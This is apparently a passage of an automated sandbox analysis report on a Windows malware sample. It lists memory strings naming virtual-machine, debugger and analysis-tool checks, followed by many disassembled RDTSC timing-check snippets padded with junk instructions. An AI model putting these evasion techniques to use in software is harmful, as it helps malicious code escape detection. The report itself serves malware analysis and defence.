Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: EA01C7 second address: EA01CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: EA01CB second address: EA01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101958C second address: 1019591 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1019591 second address: 1019599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD04 second address: 101DD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD0A second address: 101DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD0E second address: 101DD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD14 second address: 101DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F78B909B0F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD22 second address: 101DD26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD26 second address: 101DD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E04A second address: 101E050 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E49F second address: 101E4AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F78B909B0F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E4AD second address: 101E4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E4B1 second address: 101E4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D31 second address: 1021D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D35 second address: 1021D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B101h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jc 00007F78B909B0F6h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D58 second address: 1021D62 instructions: 0x00000000 rdtsc 0x00000002 js 00007F78B9095CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D62 second address: 1021E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F78B909B0F8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 sub si, 3E9Fh 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+12A01886h], eax 0x0000002e push E6C3743Ch 0x00000033 push edi 0x00000034 jnp 00007F78B909B0F8h 0x0000003a pushad 0x0000003b popad 0x0000003c pop edi 0x0000003d add dword ptr [esp], 193C8C44h 0x00000044 mov dword ptr [ebp+12A0183Eh], edi 0x0000004a and edi, dword ptr [ebp+12A01B9Bh] 0x00000050 push 00000003h 0x00000052 mov dword ptr [ebp+12A033FAh], edi 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b pop esi 0x0000005c push 00000003h 0x0000005e mov dx, 359Dh 0x00000062 call 00007F78B909B0F9h 0x00000067 jp 00007F78B909B0FEh 0x0000006d push eax 0x0000006e jmp 00007F78B909B0FBh 0x00000073 mov eax, dword ptr [esp+04h] 0x00000077 pushad 0x00000078 jne 00007F78B909B0FCh 0x0000007e push eax 0x0000007f push edx 0x00000080 jc 00007F78B909B0F6h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021F8E second address: 1021F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021F94 second address: 1021FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021FA2 second address: 1021FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 103378C second address: 1033790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1033790 second address: 1033796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1010F99 second address: 1010F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1010F9F second address: 1010FF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d pushad 0x0000000e push esi 0x0000000f jl 00007F78B9095CE6h 0x00000015 pop esi 0x00000016 jmp 00007F78B9095CF6h 0x0000001b jl 00007F78B9095CECh 0x00000021 jnl 00007F78B9095CE6h 0x00000027 pushad 0x00000028 jo 00007F78B9095CE6h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 jmp 00007F78B9095CF2h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1040FF0 second address: 1041016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B107h 0x00000007 jmp 00007F78B909B0FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041176 second address: 1041192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF4h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041192 second address: 1041198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041198 second address: 104119D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104119D second address: 10411AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F78B909B0F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10411AA second address: 10411C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F78B9095CE6h 0x00000010 jbe 00007F78B9095CE6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10411C0 second address: 10411E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 jns 00007F78B909B0F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104175E second address: 1041779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F78B9095CF5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418D8 second address: 10418DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418DC second address: 10418EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418EA second address: 10418FE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F78B909B0F6h 0x00000008 jns 00007F78B909B0F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418FE second address: 1041904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041904 second address: 1041908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041A74 second address: 1041A7E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F78B9095CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041D9D second address: 1041DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 jnc 00007F78B909B0FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F78B909B0FDh 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041DC3 second address: 1041DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042259 second address: 1042276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B102h 0x00000007 pushad 0x00000008 jns 00007F78B909B0F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351D9 second address: 10351DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351DE second address: 10351FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 je 00007F78B909B102h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351FD second address: 1035203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042969 second address: 104296D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104296D second address: 104297A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042AB9 second address: 1042ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042ABF second address: 1042AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F78B9095CEFh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042AD7 second address: 1042ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042ADB second address: 1042AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042AE5 second address: 1042AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042DDE second address: 1042E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F78B9095CE6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F78B9095CF3h 0x00000011 popad 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042E04 second address: 1042E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B108h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042E24 second address: 1042E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351B5 second address: 10351D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B102h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F78B909B0F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1043125 second address: 1043136 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F78B9095CECh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BCF second address: 1048BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F78B909B0FFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BE5 second address: 1048BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BE9 second address: 1048BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007F78B909B0F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BFC second address: 1048C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048C01 second address: 1048C06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1047D97 second address: 1047D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101453C second address: 101454B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F78B909B0F6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101454B second address: 1014565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1014565 second address: 10145AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F78B909B10Eh 0x0000000f jc 00007F78B909B113h 0x00000015 jmp 00007F78B909B0FDh 0x0000001a jmp 00007F78B909B100h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10145AF second address: 10145B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D986 second address: 104D9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 pushad 0x0000000a je 00007F78B909B0F6h 0x00000010 jmp 00007F78B909B104h 0x00000015 popad 0x00000016 push ebx 0x00000017 je 00007F78B909B0F6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D13C second address: 104D140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D140 second address: 104D14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F78B909B0F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D14C second address: 104D151 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104D804 second address: 104D82C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B104h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F78B909B100h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050DD0 second address: 1050DDA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050E43 second address: 1050E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FBh 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F78B909B107h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F78B909B0F8h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050E79 second address: 1050E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F78B9095CF6h 0x00000008 jmp 00007F78B9095CF0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push ecx 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050E99 second address: 1050EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050EA7 second address: 1050EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1050EAF second address: 1050ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F78B909B0F6h 0x0000000a popad 0x0000000b popad 0x0000000c pop eax 0x0000000d mov edi, 2A77E7A1h 0x00000012 mov dword ptr [ebp+12A01BAFh], ebx 0x00000018 push 7B38BB2Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 pop edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10511F4 second address: 105120D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 105120D second address: 1051212 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051A87 second address: 1051A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051A8B second address: 1051AA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051AA9 second address: 1051AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051AAD second address: 1051AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, ebx 0x00000008 call 00007F78B909B109h 0x0000000d mov dword ptr [ebp+12BAFEE4h], esi 0x00000013 pop edi 0x00000014 nop 0x00000015 jmp 00007F78B909B0FAh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jno 00007F78B909B0F6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1051AEB second address: 1051AF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1052580 second address: 1052584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1052584 second address: 105258A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
